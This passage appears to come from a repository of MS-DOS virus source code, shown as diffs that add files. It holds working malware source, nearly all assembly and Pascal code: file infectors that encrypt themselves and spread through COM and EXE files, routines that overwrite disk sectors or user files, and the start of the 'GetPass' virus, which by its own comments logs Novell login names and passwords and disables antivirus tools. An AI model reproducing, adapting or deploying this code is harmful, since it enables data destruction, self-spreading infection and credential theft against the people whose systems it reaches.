jnz DoInfectEXE ; No? Then JMP.
call InfectCOM
jmp short InfectedFile
nop
DoInfectEXE:
call InfectEXE
InfectedFile:
push ds
mov dx, Int24Ofs
mov ax, Int24Seg
mov ds, ax
mov ax, 2524h
int 21h ; Restore Int 24h
pop ds
retn
DoInfection endp
NewInt24:
mov al, 3
iret
FillWithSpace proc near
mov dx, offset NewInt1C
mov ax, 251Ch
int 21h ; Set New Int 1Ch
mov byte ptr NewInt1C, 90h
nop
mov ax, 0B800h
mov es, ax ; ES points to Video Memory
assume es:nothing
mov di, 0FA0h
mov ax, 720h
mov cx, 11
repne stosw
push cs
pop es ; ES = CS
assume es:seg000
retn
FillWithSpace endp
db 0 ;
db 0 ;
byte_0_699 db 0
word_0_69A dw 720h
byte_0_69C db 0Fh, 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh
db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0F7h, 0Eh
byte_0_6AE db 0EEh
db 0Ch ;
NewInt1C:
nop
sti
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
push cs
pop ds ; DS = CS
jmp short loc_0_6CA
nop
loc_0_6C0:
pop es
assume es:nothing
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
iret
loc_0_6CA:
mov ax, 0B800h
mov es, ax ; ES points to Video Memory
assume es:nothing
call sub_0_6FD
mov si, offset word_0_69A
mov cx, 22
repne movsb
cmp byte_0_6AE, 0EEh
jz loc_0_6E9
mov byte_0_6AE, 0EEh
jmp short loc_0_6EE
nop
loc_0_6E9:
mov byte_0_6AE, 0F0h
loc_0_6EE:
mov ax, es:[di]
mov ah, 0Eh
mov word_0_69A, ax
mov byte_0_699, 0
jmp short loc_0_6C0
sub_0_6FD proc near
mov di, 0
loc_0_700:
mov si, offset byte_0_69C
push di
mov cx, 18
cld
rep cmpsb
pop di
jz loc_0_718
inc di
inc di
cmp di, 4000
jnz loc_0_700
mov di, 0
loc_0_718:
cmp di, 3998
jnz locret_0_723
mov byte ptr NewInt1C, 0CFh
locret_0_723:
retn
sub_0_6FD endp
FileType db 0 ; E = EXE File C = COM File
; 0 = 1st Generation
InfMarker dw 0A0Ch
seg000 ends
end start
MSDOS/G-Index/Virus.MSDOS.Unknown.gde.pas
+60
View File
@@ -0,0 +1,60 @@
PROGRAM GDE; {By änchanter for LAME SysOps}
USES CRT;
VAR Temp : Text;
X : Integer;
Death_File : String;
{--------------------------------------------------------------------------}
PROCEDURE NoParams;
BEGIN;
SOUND(220);
DELAY(200);
NOSOUND;
TEXTCOLOR(RED);
WRITELN('You Forgot Something... ');
WRITELN;
WRITELN(' SYNTAX:');
WRITELN('GDE C:\SHOCK\USERS');
WRITELN;
WRITELN('Run AGAIN....');
WRITELN(' (c) 1990,1991');
HALT;
END;
{--------------------------------------------------------------------------}
PROCEDURE Kill_That_Fucker;
BEGIN;
ASSIGN(TEMP, Death_File);
REWRITE(TEMP);
CLOSE(TEMP);
APPEND(TEMP);
WHILE X <> 5 Do
BEGIN;
WRITELN(TEMP, 'KGB Read The User File');
WRITELN(TEMP, 'KGB Wrote The User File');
X := X + 1;
END;
WRITELN(TEMP, '<BOOM, you are dead>');
WRITELN(TEMP, 'KGB is WATCHING YOU!');
CLOSE(TEMP);
END;
{--------------------------------------------------------------------------}
PROCEDURE INIT;
BEGIN;
IF PARAMCOUNT <> 1 THEN NoParams;
Death_File := PARAMSTR(1);
TEXTCOLOR(BLUE);
WRITELN('READING USER FILE.......');
Kill_That_Fucker;
WRITELN('ERROR, USER FILE CURRUPTED!');
HALT;
END;
{--------------------------------------------------------------------------}
BEGIN;
X := 1;
INIT;
END.
MSDOS/G-Index/Virus.MSDOS.Unknown.gen12.asm
+390
View File
@@ -0,0 +1,390 @@
; GEN12.ASM -- Genesis 1:2 Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Virucidal Maniac
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
call get_dos_version
cmp ax,0005h ; Did the function return 5?
jl strt00 ; If less, do effect
call get_minute
or ax,ax ; Did the function return zero?
je strt00 ; If equal, do effect
call get_year
cmp ax,07C9h ; Did the function return 1993?
je strt00 ; If equal, do effect
jmp end00 ; Otherwise skip over it
strt00: mov ax,0002h ; First argument is 2
mov cx,0007h ; Second argument is 7
cli ; Disable interrupts (no Ctrl-C)
cwd ; Clear DX (start with sector 0)
int 026h ; DOS absolute write interrupt
sti ; Restore interrupts
end00: mov cx,0005h ; Do 5 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
jmp end01 ; Otherwise skip over it
strt01: lea si,[di + data00] ; SI points to data
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend:
end01:
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
lea dx,[di + root] ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
lea dx,[di + all_files] ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
lea dx,[di + up_dir] ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
lea dx,[di + com_mask] ; DX points to "*.COM"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
get_dos_version proc near
mov ah,030h ; DOS get DOS version function
int 021h
mov bx,ax ; Save return value in BX
xor bl,bl ; Clear DOS major version in BX
xchg bh,bl ; Place 0 in BH, minor in BL
cbw ; Sign-extend AL into AX
mov cl,100 ; CL holds multiplier
mul cl ; Multiply AL by 100
add ax,bx ; Add back the minor version
ret ; Return to caller
get_dos_version endp
get_minute proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,cl ; Copy minute into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_minute endp
get_year proc near
mov ah,02Ah ; DOS get date function
int 021h
xchg cx,ax ; Transfer the year into AX
ret ; Return to caller
get_year endp
data00 db "Genesis 1:2",13,10
db " And the earth was without form and void...",13,10
db 13,10
db " Now...So is your hard disk.",13,10
db 13,10
db " -Virucidal Maniac",13,10
vcl_marker db "[VCL]",0 ; VCL creation marker
encrypt_code proc near
push bp ; Save BP
mov bp,di ; Use BP as pointer to code
lea si,[bp + encrypt_decrypt]; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si + 1],8 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
lea di,[bp + finish] ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
lea dx,[bp + start] ; DX points to virus
lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt
mov di,bp ; DI points to virus again
pop bp ; Restore BP
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
lea si,[bp + start_of_code] ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main
MSDOS/G-Index/Virus.MSDOS.Unknown.generic.asm
+260
View File
@@ -0,0 +1,260 @@
;=============================================================================
;
; C*P*I
;
; CORRUPTED PROGRAMMING INTERNATIONAL
; -----------------------------------
; p r e s e n t s
;
; T H E
; _ _
; (g) GENERIC VIRUS (g)
; ^ ^
;
;
; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF
; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT
; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR ÒPROGRAM TO BIG TO
; FIT IN MEMORYÓ THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS.
;
; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON
; THE DISK. HAVE PHUN WITH THIS ONE.
;
; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE
; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING.
;
; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE
; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF
; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR
; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE.
;
; DOCTOR DISSECTOR
; CPI ASSOCIATES
;
;=============================================================================
MAIN:
NOP ;| Marker bytes that identify this program
NOP ;| as infected/a virus
NOP ;|
MOV AX,00 ;| Initialize the pointers
MOV ES:[POINTER],AX ;|
MOV ES:[COUNTER],AX ;|
MOV ES:[DISKS B],AL ;|
MOV AH,19 ;| Get the selected drive (dir?)
INT 21 ;|
MOV CS:DRIVE,AL ;| Get current path (save drive)
MOV AH,47 ;| (dir?)
MOV DH,0 ;|
ADD AL,1 ;|
MOV DL,AL ;| (in actual drive)
LEA SI,CS:OLD_PATH ;|
INT 21 ;|
MOV AH,0E ;| Find # of drives
MOV DL,0 ;|
INT 21 ;|
CMP AL,01 ;| (Check if only one drive)
JNZ HUPS3 ;| (If not one drive, go the HUPS3)
MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive)
HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive
LEA BX,SEARCH_ORDER ;|
ADD BX,AX ;|
ADD BX,0001 ;|
MOV CS:POINTER,BX ;|
CLC ;|
CHANGE_DISK: ;| Carry is set if no more .COM files are
JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be
MOV AH,17 ;| renamed to .COM (change .EXE to .COM)
LEA DX,CS:MASKE_EXE ;| but will cause the error message ÒProgram
INT 21 ;| to large to fit in memoryÓ when starting
CMP AL,0FF ;| larger infected programs
JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found)
MOV AH,2CH ;| If neither .COM or .EXE files can be found,
INT 21 ;| then random sectors on the disk will be
MOV BX,CS:POINTER ;| overwritten depending on the system time
MOV AL,CS:[BX] ;| in milliseconds. This is the time of the
MOV BX,DX ;| complete ÒinfectionÓ of a storage medium.
MOV CX,2 ;| The virus can find nothing more to infect
MOV DH,0 ;| starts its destruction.
INT 26 ;| (write crap on disk)
NO_NAME_CHANGE: ;| Check if the end of the search order table
MOV BX,CS:POINTER ;| has been reached. If so, end.
DEC BX ;|
MOV CS:POINTER,BX ;|
MOV DL,CS:[BX] ;|
CMP DL,0FF ;|
JNZ HUPS2 ;|
JMP HOPS ;|
HUPS2: ;| Get a new drive from the search order table
MOV AH,0E ;| and select it, beginning with the ROOT dir.
INT 21 ;| (change drive)
MOV AH,3B ;| (change path)
LEA DX,PATH ;|
INT 21 ;|
JMP FIND_FIRST_FILE ;|
FIND_FIRST_SUBDIR: ;| Starting from the root, search for the
MOV AH,17 ;| first subdir. First, (change .exe to .com)
LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the
INT 21 ;| old directory.
MOV AH,3B ;| (use root directory)
LEA DX,PATH ;|
INT 21 ;|
MOV AH,04E ;| (search for first subdirectory)
MOV CX,00010001B ;| (dir mask)
LEA DX,MASKE_DIR ;|
INT 21 ;|
JC CHANGE_DISK ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
DEC BX ;|
JZ USE_NEXT_SUBDIR ;|
FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more
MOV AH,4FH ;| are found, the (search for next subdir)
INT 21 ;| drive will be changed.
JC CHANGE_DISK ;|
DEC BX ;|
JNZ FIND_NEXT_SUBDIR ;|
USE_NEXT_SUBDIR:
MOV AH,2FH ;| Select found directory. (get dta address)
INT 21 ;|
ADD BX,1CH ;|
MOV ES:[BX],\Ó ;| (address of name in dta)
INC BX ;|
PUSH DS ;|
MOV AX,ES ;|
MOV DS,AX ;|
MOV DX,BX ;|
MOV AH,3B ;| (change path)
INT 21 ;|
POP DS ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
MOV CS:COUNTER,BX ;|
FIND_FIRST_FILE: ;| Find first .COM file in the current dir.
MOV AH,04E ;| If there are none, (Search for first)
MOV CX,00000001B ;| search the next directory. (mask)
LEA DX,MASKE_COM ;|
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
JMP CHECK_IF_ILL ;|
FIND_NEXT_FILE: ;| If program is ill (infected) then search
MOV AH,4FH ;| for another. (search for next)
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
CHECK_IF_ILL: ;| Check if already infected by virus.
MOV AH,3D ;| (open channel)
MOV AL,02 ;| (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| (save channel)
MOV AH,3FH ;| (read file)
MOV CH,BUFLEN ;|
MOV DX,BUFFER ;| (write in buffer)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV BX,CS:[BUFFER] ;| (look for three NOPÕs)
CMP BX,9090 ;|
JZ FIND_NEXT_FILE ;|
MOV AH,43 ;| This section by-passes (write enable)
MOV AL,0 ;| the MS/PC DOS Write Protection.
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV AH,43 ;|
MOV AL,01 ;|
AND CX,11111110B ;|
INT 21 ;|
MOV AH,3D ;| Open file for read/write (open channel)
MOV AL,02 ;| access (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| Read date entry of program and (channel)
MOV AH,57 ;| save for future use. (get date)
MOV AL,0 ;|
INT 21 ;|
PUSH CX ;| (save date)
PUSH DX ;|
MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp)
MOV CS:[JMPBUF],DX ;| the program will be saved for future use.
MOV DX,CS:[BUFFER+1] ;| (save new jump)
LEA CX,CONT-100 ;|
SUB DX,CX ;|
MOV CS:[CONTA],DX ;|
MOV AH,57 ;| The virus now copies itself to (write date)
MOV AL,1 ;| to the start of the file.
POP DX ;|
POP CX ;| (restore date)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus
MOV CS:[CONTA],DX ;| at address ÒCONTAÓ the jump which was at the
;| start of the program. This is done to
HOPS: ;| preserve the executability of the host
NOP ;| program as much as possible. After saving,
CALL USE_OLD ;| it still works with the jump address in the
;| virus. The jump address in the virus differs
;| from the jump address in memory
CONT DB 0E9 ;| Continue with the host program (make jump)
CONTA DW 0 ;|
MOV AH,00 ;|
INT 21 ;|
USE_OLD:
MOV AH,0E ;| Reactivate the selected (use old drive)
MOV DL,CS:DRIVE ;| drive at the start of the program, and
INT 21 ;| reactivate the selected path at the start
MOV AH,3B ;| of the program.(use old drive)
LEA DX,OLD_PATH-1 ;| (get old path and backslash)
INT 21 ;|
RET ;|
SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF
POINTER DW 0000 ;| (pointer f. search order)
COUNTER DW 0000 ;| (counter f. nth. search)
DISKS DB 0 ;| (number of disks)
MASKE_COM DB Ò*.COMÓ,00 ;| (search for com files)
MASKE_DIR DB Ò*Ó,00 ;| (search for dirÕs)
MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB
DB 0,Ó????????EXEÓ,0,0,0,0
DB 0,Ó????????COMÓ,0
MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB
DB 0,Ó???????????Ó,0,0,0,0
DB 0,Ó????????COMÓ,0
BUFFER EQU 0E00 ;| (a safe place)
BUFLEN EQU 208H ;| Length of virus. Modify this accordingly
;| if you modify this source. Be careful
;| for this may change!
JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp)
PATH DB Ò\Ó,0 ;| (first place)
DRIVE DB 0 ;| (actual drive)
BACK_SLASH DB Ò\Ó
OLD_PATH DB 32 DUP (?) ;| (old path)

MSDOS/G-Index/Virus.MSDOS.Unknown.getpass!.asm
+785
View File
@@ -0,0 +1,785 @@
;=============================================================================
; Please feel free to distribute, but do NOT change and say it's your's!
;=============================================================================
; You are now looking at the source code of the Novell GetPass virus!
; Stop doing so! But if you don't well, ok! The GetPass virus is fairly
; unique in some parts of it's behaviour. It infects *.COM files using
; an infection interrupt routine.(INT D0) It first renames the files
; it infects to a *.TXT file to avoid heuristic alarms of some rule
; based TSR's and then restores the original extention. Some resident
; anti-viral products will be completely disabled in memory and their
; CRC check files will be deleted. The GetPass routine will become
; resident if the virus detects that NETX (Novell NetWare) is loaded
; in memory, hooking INT 16 (keyboard) and INT 21 in memory.
; The GetPass routine activates when LOGIN is executed. The users login
; name and his/her password will be captured and written to a file wich
; will be created in C:\DOS.(the file is MSD.INI) If the file becomes
; approximatly 8Kb, the virus deletes the file. This to avoid a very large
; file in the DOS directory. A new file will be created and the logging
; will continue. Every first day of the month, when an infected program
; is executed the file containing the names/passwords is printed if there
; is a printer available. The virus does not infect COMMAND.COM.
;
; Greetings ,ThE wEiRd GeNiUs
;
; PS: Check your MSD.INI file once in a while!
;-----------------------------------------------------------------------------
; Assemble with TASM 2.0 or higher, Link with TLINK /T
;-----------------------------------------------------------------------------
CODE SEGMENT
ASSUME CS:CODE,DS:CODE,ES:CODE,SS:CODE
CRYPTLEN EQU CHKTIME-CSTART-1;Length to en/decrypt.
VIRLEN EQU BUFFER-VSTART ;Length of virus.
MINLEN EQU 1000 ;Min file length to infect.
MAXLEN EQU 0F230h ;Max " " " "
CR EQU 0Dh ;Return.
LF EQU 0Ah ;Line feed.
TAB EQU 09h ;Tab.
INTRO EQU LBIT-INAME ;
TSRLEN EQU LASTBYT-TSR ;Length of activation TSR.
TSR2LEN EQU NOTENC-INFECT+1;Length of infection Interrupt.
LENGTH EQU VAL_1-CSTART ;Length of encrypted code.
KBUFF EQU KEYBUFF-TSR ;\
KPTR EQU KEYPTR-TSR ;
FN EQU FNAME-TSR ;
LOGINL EQU LOGIN-TSR ;
KFLAG EQU KBFLAG-TSR ; Offsets in activation TSR.
INTOF EQU INT21-TSR ;
INT16L EQU INT16-TSR ;
OLD16L EQU NINT16-TSR ;
NINTOF EQU NINT21-TSR ;
COUCR EQU CCOUNT-TSR ;
PARLEN EQU PARAM-TSR ;/
ORG 0100h
.RADIX 16
;-----------------------------------------------------------------------------
; Infected dummy program. (Only in 1st run)
;-----------------------------------------------------------------------------
START: JMP VSTART ;Jump to virus code.
;-----------------------------------------------------------------------------
; Begin of the virus code.
;-----------------------------------------------------------------------------
VSTART: CALL CHKDOS ;-Confuse anti-viral progs.
CALL CHKTIME ;/
BEGIN: CALL ENCRYP ;Call decryption routine.
;-----------------------------------------------------------------------------
; From here the code will be encrypted.
;-----------------------------------------------------------------------------
CSTART: CALL BEGIN1 ;Same old trick.
CALL RESBEG ;Restore begin.
CALL CHKDRV ;Check drive & DOS version.
CALL SAVEDIR ;Save startup directory.
PUSH ES ;In the next sessions ES is modified.
CALL INT24 ;NoErrorAllowed.
CALL VSAFE ;Vsafe resident?
CALL ACTIVE ;Install password routine.
POP ES ;Restore extra segment.
CALL ENKEY ;Create new CRYPTKEY.
CALL INSTSR2 ;Place infection routine in memory.
CALL DTA ;Store old and give up new DTA addres.
CALL FIND1 ;Determine how many path's are present.
CALL RANDOM ;Random value for directory search.
CALL FIND2 ;Find suitable directory.
CALL CHDRIVE ;If it is on another drive.
CALL GODIR ;Go to the selected directory.
F_FIRST:MOV AH,4Eh ;Search for 1st *.COM
MOV CX,110b ;Look for read only, system & hidden.
LEA DX,[BP+OFFSET SPEC] ;Offset file specification.(*.COM)
INT 21h ;Call DOS.
JNC OPENF ;Exit if no file found.
CALL EXIT1 ;No files found, quit.
OPENF: CALL CHKCOM ;-Is it COMMAND.COM?
CMP CX,00h ;/
JE LETSGO ;Yes, do NOT infect.
CALL CHKINF ;Already infected?
CALL ATTRIB ;Ask & clear file attributes.
CALL RENAME ;Rename to *.TXT file.
MOV AH,4Eh ;Search the name.TXT file.
MOV CX,110b ;Read only, system & hidden.
LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
INT 21h ;Call DOS.
MOV AX,3D02h ;Open file with read and write access.
LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
INT 21h ;Call DOS.
MOV BYTE PTR[BP+OFFSET HANDLE],AL;Save file handle.
CALL STIME ;Save file date & time.
CHECK: MOV AH,3Fh ;Read begin of victim.
MOV CX,3 ;Read Begin.
LEA DX,[BP+OFFSET ORIGNL] ;Into offset original instructions.
INT 21h ;Call DOS.
JC CLOSE ;On error, quit.
REPLACE:CALL BPOINT ;Move file pointer to end of victim.
SUB AX,3 ;Calculate new jump.
MOV WORD PTR[BP+NEWJMP+1],AX;Store new jump value.
MOV AX,4200h ;Move file pointer to begin.
XOR CX,CX ;Zero high nybble.
XOR DX,DX ;Zero low nybble.
INT 21h ;Call DOS.
MOV AH,40h ;Write to file,
MOV CX,3 ;3 Bytes.
LEA DX,[BP+OFFSET NEWJMP] ;Offset new jump value.
INT 21h ;Call DOS.
CALL BPOINT ;Move file pointer to end.
JMP INFEC ;Create encryption key.
LETSGO: MOV AH,4Fh ;Find next.
INT 21h ;Call DOS.
JC EXIT ;On error, quit.
JMP OPENF ;Open new victim.
INFEC: MOV DL,[BP+OFFSET VAL_1] ;Encryption value into DL.
INT 0D0h ;Neat way to infect a file!
CLOSE: CALL RTIME ;Restore File time & date.
MOV AH,3Eh ;Close file.
INT 21h ;Call DOS.
CALL RENAME2 ;Restore back to COM file.
CALL RATTRIB ;Restore File attributes.
;-----------------------------------------------------------------------------
EXIT: CALL DELSTUF ;Delete CRC checkers.
EXIT1: MOV AH,1Ah ;Restore old DTA.
MOV DX,[BP+OFFSET OLD_DTA] ;Old DTA address.
INT 21h ;Call DOS.
EXIT2: MOV AH,0Eh ;Restore startup drive.
MOV DL,BYTE PTR[BP+OFFSET OLDRV];Old drive code.
INT 21h ;Call DOS.
MOV AH,3Bh ;Goto startup directory,
LEA DX,[BP+OFFSET BUFFER] ;that is stored here.
INT 21h ;Call DOS.
EXIT3: CALL RINT24 ;Restore original INT 24
EXIT4: MOV AX,100h ;
PUSH AX ;
RET ;Pass control to HOST.
;-----------------------------------------------------------------------------
DUMEX: MOV DI,0100h ;This is a dummy exit, it screws up
LEA SI,[BP+DEXIT] ;TbClean. In stead of cleaning the
MOV CX,3 ;phile, it puts a program terminating
REPNZ MOVSB ;interrupt in the beginning of the
MOV AX,0100h ;victim, neat huh!
PUSH AX ;
RET ;
;-----------------------------------------------------------------------------
BETWEEN:MOV AH,3Eh ;Close the file.
INT 21h ;Call DOS
JMP LETSGO ;Find next file.
CHKINF: MOV AX,3D00h ;Open file with only read acces.
MOV DX,WORD PTR[BP+OFFSET NP];Offset filename.
INT 21h ;Call DOS.
MOV BX,AX ;File handle into BX.
MOV CX,0FFFFh ;- Move -3 into CX,DX.
MOV DX,0FFFCh ;/
MOV AX,4202h ;Move file pointer to end-3
INT 21h ;Call DOS.
MOV AH,3Fh ;Read file.
MOV CX,01h ;One Byte.
LEA DX,[BP+OFFSET MARK1] ;Into this address.
INT 21h ;Call DOS.
CMP BYTE PTR [BP+OFFSET MARK1],43h; Is it infected?
JE BETWEEN ;Yes, find another.
CALL BPOINT ;Go to EOF.
CMP AX,MAXLEN ;Is the file to long?
